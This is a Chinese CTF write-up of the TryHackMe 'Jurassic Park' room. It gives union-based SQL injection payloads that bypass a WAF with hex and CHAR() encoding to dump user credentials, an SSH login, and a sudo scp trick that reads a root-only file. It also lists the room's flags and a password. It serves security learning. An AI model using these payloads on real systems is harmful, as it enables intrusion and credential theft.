tryhackme靶场之Jurassic Park

nmap

nmap一下，只发现22和80

sql

进入item.php似乎参数id能被注入

测试发现当id为123有内容，其他返回no result但是id=5会返回

Dennis, why have you blocked these characters: ' # DROP - username @ ---- Is this our WAF now?

基于这些waf猜测union也许可以

测试?id=1 union select 1,2,3,4,5 似乎能联注

测试发现2345行能会回显，但是这里一个即可 1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x7573657273

由于过滤了'，用16进制绕过

id,username,password,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

?id=1 union select 1,CHAR(117,115,101,114,110,97,109,101),3,password,5 from users

密码ih8dinos

突然发现还要写题，于是从头走一遍

?id=5%20union%20select%201,2,3,4,database()

park

?id=1 union select 1,version(),3,4,5

5.7.25-0ubuntu0.16.04.2 -> ubuntu 16.04

ssh

用dennis用户，密码上面的登录进ssh

获取flag1

b89f2d69c56b9981ac92dd267f

全局查询有flag字样的拿到第二个flag

/boot/grub/fonts/flagTwo.txt

96ccd6b429be8c9a4b501c7a0b117b0a

检查.bash_history获取flag3

b4973bbc9053807856ec815db25fb3f1

顺便看到flag5的位置（题目没有flag4）

/root/flag5.txt

但是Permission denied

但是很奇怪，sudo cat不了但是bash历史告诉我能执行

因为有如下记录

sudo scp /root/flag5.txt [email protected]:~/

这说明scp有特殊权限

查询发现scp相当于cp升级版，支持ssh连接，也可以像cp一样用

直接

sudo scp /root/flag5.txt ./1

2a7074e491fcacc7eeba97808dc5e2ec

至此，完成渗透

有一点点提权，但是不多，sql注入也挺简单

当个ctf题目写就行了，难度一般般